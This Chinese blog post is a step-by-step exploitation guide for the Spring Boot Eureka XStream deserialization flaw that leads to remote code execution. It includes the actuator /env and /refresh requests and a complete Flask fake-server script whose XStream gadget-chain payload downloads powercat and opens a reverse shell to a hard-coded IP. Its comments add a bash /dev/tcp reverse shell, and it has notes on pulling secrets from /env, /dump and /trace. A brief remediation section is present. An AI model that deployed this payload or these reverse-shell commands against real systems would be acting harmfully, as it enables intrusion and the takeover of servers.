您的位置 首页 php

「web安全」Spring Boot eureka xstream 反序列化

智云科技发布于 2022年9月7日评论关闭阅读(275)

一、漏洞概述

Eureka 是 Spring Cloud Netflix 模块的子模块,它是 Spring Cloud 对 Netflix Eureka 的二次封装,主要负责 Spring Cloud 的服务注册与发现功能,开发人员只需引入相关依赖和注解轻松将 Spring Boot 与 Eureka 进行整合。

安全人员(Michael Stepankin)发现,服务注册与发现功能可能被滥用,当 eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL地址并/refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload。目标机器解析 payload,触发 XStream 反序列化,造成 RCE 漏洞。

二、利用条件

1.目标可出网

2.目标使用的 eureka-client < 1.8.7(存在 spring-cloud-starter-netflix-eureka-client 依赖)

3.可用 POST 方式请求目标网站的 /env 接口,并设置zone属性

4.可用 POST 方式请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)

三、漏洞环境

Web服务器:Windows Server 2012, JDK8u131 (1.13.190.222)

VPS: Ubuntu 16.04.7 LTS (162.14.73.205)

四、正常访问

访问URL: , 得到一些json格式的敏感数据。

五、漏洞利用

提前在VPS服务器准备相关文件和监听服务,利用VPS python起的fake server 串联调用执行代码。

Web服务器:Windows Server 2012, JDK8u131(1.13.190.222)

VPS: Ubuntu 16 (162.14.73.205)

步骤一:架设脚本

响应恶意 XStream payload 的 python 脚本示例(依赖Flask),脚本还需要配合弹shell命令。

对于Linux,可以利用目标机器上自带的 python 来反弹shell。

对于Windows,可以利用 powercat.ps1 来反弹shell。

启动脚本 python3 eureka-rce.py

Flask Server 8883

步骤二:NC监听

File Server 8000

对于windows平台弹 shell,用python3 -m http.server 8000,快速搭建powercat.ps1 文件下载服务。

使用 nc 监听端口,等待反弹 shell

nc -lvp 8885

步骤三:设置defaultZone

设置 eureka.client.serviceUrl.defaultZone 属性

版本1:spring 1.x 

 POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=

版本2:spring 2.x 

 POST /actuator/env
Content-Type: application/json

{"name":"eureka.client.serviceUrl.defaultZone","value":"#34;}

返回200,body内容为 {“eureka.client.serviceUrl.defaultZone”:”#34;} ,即设置成功。

步骤四:刷新配置

版本1:spring 1.x

版本2:spring 2.x

返回200,body [] 为刷新成功。

接到Shell

六、漏洞修复

可考虑禁用/env接口(endpoints.env.enabled= false),但需要不影响业务/运维。通常考虑对/env接口进行鉴权,通过在 pom.xml 文件下引入 spring-boot-starter-security 依赖,并在 application.properties 中开启security功能,配置访问账号密码,重启应用。 

 pom.xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-security</artifactId>
</dependency>

application.properties
management.security.enabled=true
security.user.name=administrator
security.user.password=123456

附录

1.python脚本 

 # -*- coding: utf-8 -*-
# home.php?mod=space&uid=59738    : 2022-3-11 20点48分
# home.php?mod=space&uid=210785    : eureka-rce.py

# linux反弹shell    
#             <string>/bin/bash</string>
#             <string>-c</string>
#             <string>bash -i >& /dev/tcp/162.14.73.205/8885 0>&1</string>

# windows反弹shell   
#              <string>powershell</string>
#              <string>IEX (New-Object System.Net.Webclient).DownloadString('#39;);</string>

# windows反弹shell   
#              <string>cmd.exe</string>
#              <string>/c</string>
#              <string>ping %COMPUTERNAME%.6f9796ab.dns.bypass.eu.org</string>

# windows dnslog     
#              <string>cmd.exe</string>
#              <string>/c</string>
#              <string>ping 757013cd.dns.bypass.eu.org</string>

from flask import Flask, Response

app = Flask(__name__)

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods = ['GET', 'POST'])
def catch_all(path):
    xml = """<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
<string>powershell</string>
<string>IEX (New-Object System.Net.Webclient).DownloadString('#39;);powercat -c 162.14.73.205 -p 8885 -e cmd</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>"""
    return Response(xml, mimetype='application/xml')
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8883)

2.其他接口利用

/env : 获取环境属性,数据库密码等,如数据库在外网并且未进行白名单限制,可拿数据库权限。

/mappings: 获取接口列表,如接口未鉴权,可进一步获得敏感信息。

/dump: 获得内存快照,配合VisualVM 可进一步获得敏感信息。

/trace:获取认证信息,类似druid/index.html泄露session等认证信息,可进一步利用权限突破。

标签:
打赏 点赞(1)

文章来源:智云一二三科技

文章标题:「web安全」Spring Boot eureka xstream 反序列化

文章地址:https://www.zhihuclub.com/77175.shtml

关于作者: 智云科技

相关文章

热门文章

1分享新浪图床上传接口源码

点赞(881)阅读(58,812)

2PHP简单实现路由Route功能

点赞(1.10K)阅读(35,928)

3Tideways、xhprof 和 xhgui 打造 PHP 非侵入式监控平台

点赞(306)阅读(4,264)

4centos系统如何查看是否安装了mysql

点赞(484)阅读(3,743)

5curl 工具简述

点赞(454)阅读(2,950)
网站地图